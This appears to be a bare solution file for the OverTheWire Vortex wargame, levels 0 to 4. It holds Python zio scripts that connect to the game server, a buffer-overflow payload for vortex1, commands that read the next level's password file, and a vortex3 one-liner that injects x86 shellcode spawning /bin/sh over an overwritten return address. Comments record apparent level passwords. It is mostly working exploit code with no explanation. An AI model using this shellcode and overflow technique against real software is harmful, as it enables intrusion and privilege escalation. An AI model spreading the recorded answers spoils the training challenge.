import zio
addr = ("vortex.labs.overthewire.org", 5842)
io = zio.zio(addr)
i = zio.l32(io.read(4))
i += zio.l32(io.read(4))
i += zio.l32(io.read(4))
i += zio.l32(io.read(4))
io.write(zio.l32(i))
io.interact()

#Gq#qu3bF3
import zio
io = zio.zio("ssh -t -t vortex1@vortex.labs.overthewire.org")
io.TIMEOUT = 20
io.read_until(["~$ "])
io.writeline("/vortex/vortex1")
payload = "\\"*0x105 + "\xca\xca"
io.write(payload)
io.interact()

#23anbT\rE
#vortex2@melinda:/vortex$ ./vortex2 /etc/vortex_pass/vortex3
#vortex2@melinda:/vortex$ cat '/tmp/ownership.$$.tar'

#vortex3
#64ncXTvx#
./vortex3 $(python -c 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"a"*(0x84-34)+"\x12\x83\x04\x08"')

#vortex4
#2YmgK1=jw
